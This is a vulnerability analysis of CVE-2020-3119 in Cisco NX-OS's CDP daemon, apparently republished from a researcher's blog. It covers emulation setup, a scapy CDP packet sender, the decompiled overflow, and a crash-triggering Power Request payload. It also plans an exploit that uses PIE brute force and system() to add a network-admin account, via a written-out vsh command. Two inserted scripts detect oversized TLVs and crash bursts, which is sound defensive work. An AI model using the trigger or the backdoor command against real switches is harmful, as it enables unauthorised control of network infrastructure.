
Analysis of CVE-2020-3119, a stack overflow vulnerability in the Cisco CDP protocol

2025-01-15 Update From: SLTechnology News&Howtos

Shulou (Shulou.com) 05/31

This article analyzes CVE-2020-3119, a stack overflow vulnerability in the Cisco CDP protocol implementation, and is shared here as a reference.

Cisco Discovery Protocol (CDP) is a link-layer protocol used to discover Cisco devices on a local area network. Several vulnerabilities in the Cisco CDP protocol were disclosed recently; I picked a stack overflow, CVE-2020-3119, to work on first. Armis Labs has also made their analysis paper public.

Environment building

Although I have been working on IoT-related research recently, this is the first time I have worked on a medium-sized device with a relatively complex architecture, and most of my time was still spent fiddling with the environment.

CVE-2020-3119 affects Cisco NX-OS devices. I looked up the CVE in Cisco's security center to find the affected devices, and found that they are very expensive and difficult to buy, so there is no testing or research on real hardware for the time being. I then searched for the firmware of the affected devices, which has to be paid for. Then I searched the omnipotent Taobao, where resellers offer it: some sell it for 50 or 60 (a loss), some for a little over ten yuan.

After I got the firmware, my first thought was to unpack it, and my second thought was to run it. At first I wanted to unpack the firmware and look for the cdp binary, but I ran into a pitfall while unpacking.

These days, the only tool for unpacking firmware is binwalk. It is the only one I know, and the friends I asked did not seem to know of anything else either (if there is one, recommendations are welcome).

But binwalk's algorithm is very time-consuming when the firmware contains many compressed archives. I ran it for two days and it had not finished decompressing even half of it. Decompressing the firmware took a long time and came to nothing in the end.

In the end, the only option was to find a way to get the firmware running, and I happened to know of software that can emulate Cisco devices: GNS3.

Instructions for using GNS3

After learning to use GNS3, I found that the software is really easy to use.

First we need to download the GNS3 software, and then the GNS3 VM. The GNS3 installed on a personal computer provides the graphical interface and can be regarded as the control console. The GNS3 VM acts as the GNS3 server and can be run locally or remotely as a virtual machine. The devices emulated by GNS3 all run on the GNS3 server.

1. Set up the GNS3 VM first.

2. Create a new template

3. Select the switch Cisco NX-OSv 9000

Here we see that the device is emulated with qemu, so we first need to download the qcow2 image.

The corresponding version of the firmware is then imported into GNS3 Server.

After the import is complete, you can see the newly added device in the switch column.

4. Drag the Cisco device to the center and use a network cable to connect the devices directly

A note here: Toolbox is an ubuntu docker template that I added myself. At first, I used docker connected to any network card of the switch to run tests.

But then I found that GNS3 also provides another feature, the Cloud1 in the figure, which can represent any network card on your host or GNS3 Server.

Because the tools I usually use are in an ubuntu virtual machine on my Mac, the method I use now is to connect a network card of the ubuntu virtual machine directly to the Cisco switch.

PS: from a preliminary look, GNS3 provides this simple direct network connection through ubridge, which it developed itself and which can be found on GitHub. From what I could observe, it forwards traffic packets over UDP.

During testing, we can also right-click the link and capture packets with wireshark.

5. Start all nodes

Finally, click the start button on the upper toolbar to start all your devices, or you can choose to start separately if you don't want to start all of them.

Research on Cisco switch

However, at this point the network is not yet connected, and we need to connect to the switch through the serial port to configure the network. By default, GNS3 forwards the device's serial port over telnet, and the telnet IP/port is shown in the upper right corner of the GNS3 interface.

The first connection to the switch requires initialization. Once that is done, you can log in to the Cisco management shell with the administrator account and password you set.

After some research, I found that the device is structured as follows: qemu starts a bootloader, and in the bootloader's file system there is an nxos.9.2.3.bin file, which is the main firmware of the device. After boot there is a Linux system, and inside that Linux system another virtual machine, guestshell, and a vsh.bin are launched. On this device, vsh takes the place of the bash we normally use on Linux. When we connect over telnet, what we see is the vsh interface. From vsh you can enable telnet/ssh, and you can also enter a Linux shell, but that shell is the Linux system inside the guestshell virtual machine.

The cdp program studied here cannot be seen inside the guestshell virtual machine. Further research showed that vsh has a python command, and that this python is an nxpython program that lives on the Cisco host. So you can use python to get a Linux shell on the Cisco host, then use the MAC address to find the network card you set up in GNS3 and set its IP address.

    Cisco# python
    Python 2.7.11 (default, Feb 26 2018, 03:34:16)
    [GCC 4.6.3] on linux2
    Type "help", "copyright", "credits" or "license" for more information.
    >>> import os
    >>> os.system("/bin/bash")
    bash-4.3$ id
    uid=2002(admin) gid=503(network-admin) groups=503(network-admin) (network-operator)
    bash-4.3$ sudo -i
    root@Cisco# ifconfig eth8
    eth8      Link encap:Ethernet  HWaddr 0c:76:e2:d1:ac:07
              inet addr:192.168.102.21  Bcast:192.168.102.255  Mask:255.255.255.0
              UP BROADCAST RUNNING PROMISC MULTICAST  MTU:1500  Metric:1
              RX packets:82211 errors:61 dropped:28116 overruns:0 frame:61
              TX packets:137754 errors:0 dropped:0 overruns:0 carrier:0
              collisions:0 txqueuelen:1000
              RX bytes:6639702 (6.3 MiB)  TX bytes:246035115 (234.6 MiB)
    root@Cisco# ps aux | grep cdp
    root 10296 0.0 0.8 835212 70768 ? Ss Mar18 0:01 /isan/bin/cdpd
    root 24861 0.0 5948 1708 ttyS0 S+ 05:30 0:00 grep cdp

After setting up the ip, we can then test the network connectivity in the ubuntu virtual machine on our mac. Normally, the network is connected at this time.

You can then add the ubuntu virtual machine's public key to /root/.ssh/authorized_keys on the Cisco device and connect to the Cisco bash shell over ssh. The device's Linux system comes with many programs, such as gdbserver, which is used in the later debugging. nxpython also has scapy installed.

Send CDP packets using scapy

Next, let's look at how to send CDP packets. The format of CDP packets is shown in the analysis released by Armis Labs. We can also enable CDP on the Cisco device and look at the CDP packets it sends.

    Cisco# conf ter
    Cisco(config)# cdp enable
    # for example, ethernet 1/7 is the port directly connected to me
    Cisco(config)# interface ethernet 1/7
    Cisco(config-if)# no shutdown
    Cisco(config-if)# cdp enable
    Cisco(config-if)# end
    Cisco# show cdp interface ethernet 1/7
    Ethernet1/7 is up
        CDP enabled on interface
        Refresh time is 60 seconds
        Hold time is 180 seconds

Then we can capture packets on the network card directly with wireshark, or capture them through GNS3, to study the format of the CDP protocol.

Because I am used to writing PoCs in python, I started looking into how to send CDP packets with python, and found that scapy has some built-in support for CDP packets.

Here is a simple example:

    from scapy.contrib import cdp
    from scapy.all import Ether, LLC, SNAP, sendp

    # Device ID value; the page uses `cmd` without defining it, so this is a placeholder
    cmd = b"device-id"

    # link layer
    l2_packet = Ether(dst="01:00:0c:cc:cc:cc")
    # Logical-Link Control
    l2_packet /= LLC(dsap=0xaa, ssap=0xaa, ctrl=0x03) / SNAP()
    # Cisco Discovery Protocol
    cdp_v2 = cdp.CDPv2_HDR(vers=2, ttl=180)
    deviceid = cdp.CDPMsgDeviceID(val=cmd)
    portid = cdp.CDPMsgPortID(iface=b"ens38")
    # one IPv4 address record
    address = cdp.CDPMsgAddr(naddr=1, addr=cdp.CDPAddrRecordIPv4(addr="192.168.1.3"))
    cap = cdp.CDPMsgCapabilities(cap=1)
    cdp_packet = cdp_v2/deviceid/portid/address/cap
    packet = l2_packet / cdp_packet
    sendp(packet)

Trigger vulnerability

The next step is to figure out how to trigger the vulnerability. First, copy cdpd off the device, then load the binary into IDA to look for the vulnerability. According to the vulnerability analysis released by Armis Labs, the vulnerability is in the cdpd_poe_handle_pwr_tlvs function. The relevant vulnerable code is as follows:

    if ( (signed int)v28 > 0 )
    {
      v35 = (int *)(a3 + 4);
      v9 = 1;
      do
      {
        v37 = v9 - 1;
        v41[v9 - 1] = *v35;
        *(&v40 + v9) = _byteswap_ulong(*(&v40 + v9));
        if ( !sdwrap_hist_event_subtype_check(7536640) )
        {
          *(_DWORD *)v38 = 104;
          snprintf(&s, 0x200u, "pwr_levels_requested[%d] = %d\n", v37, *(&v40 + v9));
          sdwrap_hist_event(7536640, strlen(&s) + 5, v38);
        }
        if ( sdwrap_chk_int_all(104, 0, 0, 0, 0) )
        {
          v24 = *(&v40 + v9);
          buginf_ftrace(1, &sdwrap_dbg_modname, 0, "pwr_levels_requested[%d] = %d\n");
        }
        snprintf(v38, 0x3FCu, "1111 pwr_levels_requested[%d] = %d\n", v37, *(&v40 + v9), v24);
        sdwrap_his_log_event_for_uuid_inst(124, 124, 1, 0, strlen(v38) + 1, v38);
        *(_DWORD *)(a1 + 4 * v9 + 1240) = *(&v40 + v9);
        ++v35;
        ++v9;
      }
      while ( v9 != v28 + 1 );
    }
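The loop above copies one 4-byte value per requested power level into a stack array, so a defender inspecting captured CDP traffic can flag a Power Request TLV (type 0x0019, sent later on this page as CDPMsgUnknown19) that carries an unusually long list. The following is an added example, not code from the original post, Armis Labs or Cisco; the TLV body layout (2-byte request ID, 2-byte management ID, then 4-byte levels), the limit of 10 levels and the sample packets are assumptions constructed for illustration.

```python
import struct

POWER_REQUEST = 0x0019    # Power Request TLV (CDPMsgUnknown19 on this page)
MAX_LEVELS = 10           # assumed policy limit, not a vendor-documented value

def iter_tlvs(cdp):
    """Yield (type, value) for every TLV after the 4-byte CDP header."""
    off = 4                                   # version, ttl, checksum
    while off < len(cdp):
        if off + 4 > len(cdp):
            raise ValueError("truncated TLV header at offset %d" % off)
        tlv_type, tlv_len = struct.unpack_from("!HH", cdp, off)
        if tlv_len < 4 or off + tlv_len > len(cdp):
            raise ValueError("bad TLV length %d at offset %d" % (tlv_len, off))
        yield tlv_type, cdp[off + 4:off + tlv_len]
        off += tlv_len

def inspect_cdp(cdp, max_levels=MAX_LEVELS):
    """Return a list of findings; an empty list means nothing was flagged."""
    findings = []
    try:
        for tlv_type, value in iter_tlvs(cdp):
            if tlv_type != POWER_REQUEST:
                continue
            # Assumed body: request ID (2), management ID (2), 4-byte levels.
            if len(value) < 4 or (len(value) - 4) % 4:
                findings.append("power request: malformed body (%d bytes)" % len(value))
                continue
            levels = (len(value) - 4) // 4
            if levels > max_levels:
                findings.append("power request: %d levels (limit %d)" % (levels, max_levels))
    except ValueError as exc:
        findings.append("malformed CDP: %s" % exc)
    return findings

def tlv(tlv_type, value):  # builds the constructed samples below
    return struct.pack("!HH", tlv_type, len(value) + 4) + value

# Constructed samples: CDP header (version 2, ttl 180, checksum 0) plus TLVs.
HEADER = struct.pack("!BBH", 2, 180, 0)
DEVICE_ID = tlv(0x0001, b"switch-a")
IDS = b"\x00\x01\x00\x02"                     # request ID, management ID
BENIGN = HEADER + DEVICE_ID + tlv(POWER_REQUEST, IDS + struct.pack("!I", 15400))
OVERSIZED = HEADER + DEVICE_ID + tlv(POWER_REQUEST, IDS + struct.pack("!I", 15400) * 21)
TRUNCATED = HEADER + DEVICE_ID + b"\x00\x19\x00\x40"   # length runs past the end

if __name__ == "__main__":
    for name, pkt in (("benign", BENIGN), ("oversized", OVERSIZED), ("truncated", TRUNCATED)):
        print(name, inspect_cdp(pkt))
```

The input is the CDP payload that follows the LLC/SNAP header; tune `max_levels` to what legitimate powered devices on the network actually send.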

The rest of the analysis is still based on the Armis Labs vulnerability analysis article: adding a Power Request and a Power Level to the CDP packet is enough to make the cdpd program crash:

    power_req = cdp.CDPMsgUnknown19(val="aaaa" + "bbbb" * 21)
    power_level = cdp.CDPMsgPower(power=16)
    cdp_packet = cdp_v2/deviceid/portid/address/cap/power_req/power_level

Exploit

First, take a look at the binary's protections:

    $ checksec cdpd_9.2.3
        Arch:     i386-32-little
        RELRO:    No RELRO
        Stack:    No canary found
        NX:       NX enabled
        PIE:      PIE enabled
        RPATH:    '/isan/lib/convert:/isan/lib:/isanboot/lib'

Only NX and PIE are enabled, and it is a 32-bit program.

Because the program cannot be interacted with and the whole payload has to be sent at once, there is no way to leak an address. But because it is a 32-bit program and cdpd restarts automatically after each crash, we can brute-force the address.
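Brute-forcing an address against a daemon that restarts after every crash leaves a visible trail: many cdpd crashes in a short time. The following added example (not part of the original post) finds such bursts with a sliding window; the log line format, the threshold and the sample lines are constructed assumptions, so adapt the pattern to the crash message your device actually emits.

```python
import re
from collections import deque
from datetime import datetime, timedelta

# Assumed line format (constructed for this example, not NX-OS output):
#   2020-03-18T05:30:01 cdpd[10296]: terminated by signal 11
CRASH_RE = re.compile(r"^(\S+) (\w+)\[\d+\]: terminated by signal (\d+)$")

def crash_bursts(lines, process="cdpd", threshold=5, window=timedelta(minutes=10)):
    """Return (start, end, count) for each run of >= threshold crashes within window."""
    recent, bursts = deque(), []
    for line in lines:
        m = CRASH_RE.match(line.strip())
        if not m or m.group(2) != process:
            continue
        ts = datetime.strptime(m.group(1), "%Y-%m-%dT%H:%M:%S")
        recent.append(ts)
        while ts - recent[0] > window:        # drop crashes older than the window
            recent.popleft()
        if len(recent) >= threshold:
            if bursts and bursts[-1][1] >= recent[0]:
                # still overlapping the last burst: extend it by this crash
                bursts[-1] = (bursts[-1][0], ts, bursts[-1][2] + 1)
            else:
                bursts.append((recent[0], ts, len(recent)))
    return bursts

# Constructed sample log: one isolated crash, then six crashes in about three minutes.
SAMPLE = [
    "2020-03-18T01:10:00 cdpd[812]: terminated by signal 11",
    "2020-03-18T05:30:01 cdpd[10296]: terminated by signal 11",
    "2020-03-18T05:30:40 cdpd[10311]: terminated by signal 11",
    "2020-03-18T05:31:02 ntpd[440]: terminated by signal 15",
    "2020-03-18T05:31:19 cdpd[10325]: terminated by signal 11",
    "2020-03-18T05:31:58 cdpd[10340]: terminated by signal 11",
    "2020-03-18T05:32:37 cdpd[10352]: terminated by signal 11",
    "2020-03-18T05:33:16 cdpd[10367]: terminated by signal 11",
]

if __name__ == "__main__":
    for start, end, count in crash_bursts(SAMPLE):
        print("%d cdpd crashes between %s and %s" % (count, start, end))
```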

There are a few points to pay attention to before writing an exploit script:

1. After the stack overflow overwrites the return address, it goes on to overwrite the function parameters that were passed in.

    *(_DWORD *)(a1 + 4 * v9 + 1240) = *(&v40 + v9);

Because this code sits next to the vulnerable code, a value gets written to an address near a1. If you overwrite only the return address, simply jumping to one address is not enough to execute a command. So our payload needs to overwrite a1 with a writable address.

2. In the cdpd_poe_handle_pwr_tlvs function, many branches go into the cdpd_send_pwr_req_to_poed function, and in that function there is a __memcpy_to_buf call that limits the length of the Power Requested data to 40 bytes. Such a short length is not enough for the overflow, so we cannot take a branch that calls that function.

    v10 = *(_WORD *)(a1 + 1208);
    v11 = *(_WORD *)(a1 + 1204);
    v12 = *(_DWORD *)(a1 + 1212);
    if ( v32 != v10 || v31 != v11 )

We need this condition to be False so that the branch is not entered. Therefore, the values at the overwritten a1 address need to be constructed accordingly.

3. The ultimate goal of the exploit is not to execute execve("/bin/bash"): because there is no way to interact, executing that command is useless. So what can we do with it? First, we can execute code that connects back with a reverse shell. Second, we can add an administrator account, for example by executing the following command:

    /isan/bin/vsh -c "configure terminal ; username test password qweASD123 role network-admin"

We can do this by executing system(cmd). The next question is how to pass the parameter. After research, I found that the contents of the DeviceID-related fields in the CDP protocol are stored on the heap, and the heap address is stored on the stack. We can adjust the stack address through ret. This makes it possible to pass arbitrary parameters to the system function.
